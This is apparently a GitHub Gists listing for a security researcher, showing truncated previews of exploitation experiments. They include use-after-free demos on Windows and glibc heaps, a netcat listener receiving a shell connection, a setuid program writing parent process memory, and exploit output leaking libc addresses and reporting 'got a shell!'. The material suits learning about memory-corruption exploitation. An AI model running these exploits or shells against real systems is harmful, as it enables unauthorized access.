@inaz2
inaz2 / CLSID_Windows10EnterpriseEvaluation_10.0.19041.csv
Last active Nov 30, 2021
default CLSID/IID list (Windows 10 Enterprise Evaluation 10.0.19041)
View CLSID_Windows10EnterpriseEvaluation_10.0.19041.csv
"Registry path","CLSID","(default)","AppID","ProgID","InprocServer32"
"HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\CLSID","CLSID","{0000031A-0000-0000-C000-000000000046}","","",""
"HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0000002F-0000-0000-C000-000000000046}","{0000002F-0000-0000-C000-000000000046}","CLSID_RecordInfo","","","C:\Windows\System32\oleaut32.dll"
"HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00000300-0000-0000-C000-000000000046}","{00000300-0000-0000-C000-000000000046}","StdOleLink","","","combase.dll"
"HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00000301-A8F2-4877-BA0A-FD2B6645FB94}","{00000301-A8F2-4877-BA0A-FD2B6645FB94}","PSFactoryBuffer","","","C:\Windows\system32\windowscodecs.dll"
"HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00000303-0000-0000-C000-000000000046}","{00000303-0000-0000-C000-000000000046}","FileMoniker","","file","combase.dll"
@inaz2
inaz2 / Source.cpp
Created Jun 3, 2017
use-after-free on Low Fragmentation Heap (without /SDL, Windows 10, Visual Studio 2015)
View Source.cpp
#define WIN32_LEAN_AND_MEAN
#include <Windows.h>
#include <stdio.h>
class Cat {
    char name[0x20];
public:
    virtual void cry() { puts("meow"); }
};
@inaz2
inaz2 / test.c
Created Jun 3, 2017
use-after-free on glibc's ptmalloc (Ubuntu 16.04.2, Ubuntu GLIBC 2.23-0ubuntu7)
View test.c
$ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 16.04.2 LTS
Release: 16.04
Codename: xenial
$ /lib/x86_64-linux-gnu/libc.so.6
GNU C Library (Ubuntu GLIBC 2.23-0ubuntu7) stable release version 2.23, by Roland McGrath et al.
Copyright (C) 2016 Free Software Foundation, Inc.
View test.py
$ nc -v -l 4444
Listening on [0.0.0.0] (family 0, port 4444)
Connection from [127.0.0.1] port 4444 [tcp/*] accepted (family 2, sport 50250)
id
uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)
View rails4_tamper_cookie.rb
View digits_tsne_scatter.ipynb
View digits_pca_scatter.ipynb
View iris_pca_scatter.ipynb
@inaz2
inaz2 / write_ppid_memory.c
Created Jan 4, 2017
write memory of the parent process via /proc/$PPID/mem
View write_ppid_memory.c
$ gcc write_ppid_memory.c -o write_ppid_memory
$ sudo chown root write_ppid_memory
$ sudo chmod u+s write_ppid_memory
$ ls -al
-rwsr-xr-x 1 root user 8984 Jan 4 14:35 write_ppid_memory*
-rw-r--r-- 1 user user 475 Jan 4 14:28 write_ppid_memory.c
View rec.py
$ python rec.py
[+] bin_base = 56580000
[+] libc_puts = f759f140
[+] libc_system = f757a940
[+] libc_binsh = f7698e8b
[+] got a shell!
id
uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare),999(docker)